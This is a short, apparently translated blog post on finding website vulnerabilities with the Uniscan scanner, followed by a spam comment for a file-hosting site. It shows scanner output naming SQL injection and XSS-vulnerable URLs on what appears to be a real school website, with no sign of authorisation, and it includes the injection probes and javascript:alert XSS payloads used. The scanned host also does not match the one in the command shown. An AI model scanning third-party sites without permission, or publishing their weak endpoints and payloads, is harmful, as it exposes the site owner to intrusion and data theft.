
How to Find Website Vulnerabilities with Uniscan

Assalamuallaikum wr.wb


I've been using this OS for 7 hours now :D, and it's not much different from my old Ubuntu, it just comes with a more complete set of tools *oops, oversharing*. In this post I want to share how to find out what vulnerabilities a website has, for example SQLi and XSS; this time I'm using uniscan. This is just for knowledge, and I'm not a hacker. OK, let's get straight to it.




[+] uniscan



So that's what it looks like. Moving on.

[+] uniscan -u http://sempak.com/ -qweds , I'm just using the default options


And after waiting for about 2 minutes, it found the goods:




| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=18+AND+1=1    
| [+] Keyword: Temporarily
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=10+AND+1=1    
| [+] Keyword: status
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/notice-board.php?linkid=8+AND+1=1    
| [+] Keyword: Bokhari
|                                                                                                  
|                                                                                                  
| Local File Include:
|                                                                                                  
|                                                                                                  
| PHP CGI Argument Injection:
|                                                                                                  
|                                                                                                  
| Remote Command Execution:
|                                                                                                  
|                                                                                                  
| Remote File Include:
|                                                                                                  
|                                                                                                  
| SQL Injection:
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=16"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=8'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=8"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=9'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=13"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9"              
|                                                                                                  
|                                                                                                  
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">              
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<DIV STYLE="background-image: url(javascript:alert('XSS'))">              
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<table background="javascript:alert('XSS')"></table>



That's all for this post from me, I hope it's useful ^_^ ~


1 comment

  1. Let me introduce myself, I'm from the kumpulbagi team. I'd like to know, are you perhaps planning to collect files using a new hosting service?
    If so, please visit this website www.kumpulbagi.com for more information.

    There you can freely share and download family and trip photos, music, videos, films, etc. in unlimited quantity and for unlimited time, after registering first. Free :)
